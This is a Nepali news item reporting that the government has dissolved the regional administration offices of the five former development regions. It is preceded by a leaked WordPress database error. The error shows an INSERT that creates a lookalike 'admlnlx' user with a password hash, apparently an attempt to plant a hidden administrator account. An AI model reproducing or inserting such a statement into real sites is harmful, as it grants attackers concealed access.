WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZeVJg8K74SqnWsaJ.n42Inim1xx1y0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:17:09', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, २८ चैत, काठमाडौं । सरकारले पहिलेको पाँच विकास क्षेत्रमा रहेको क्षेत्रीय प्रशासन कार्यालयहरु खारेज गरेको छ । केही दिनअघि बसेको मन्त्रिपरिषाद बैठकले धनकुटा, हेटौंडा, पोखरा, सुर्खेत र दिलायलमा रहेको क्षेत्रीय प्रशासन कार्यालय खारेज गरेको हो ।
छेत्रीय कार्यालयमा रहेका सबै सम्पत्ति सम्बन्धित प्रदेशको मुख्यमन्त्री कार्यालय मातहत जाने सञ्चार तथा सूचना प्रविधिमन्त्री गोकुल बास्कोटाले जानकारी दिए ।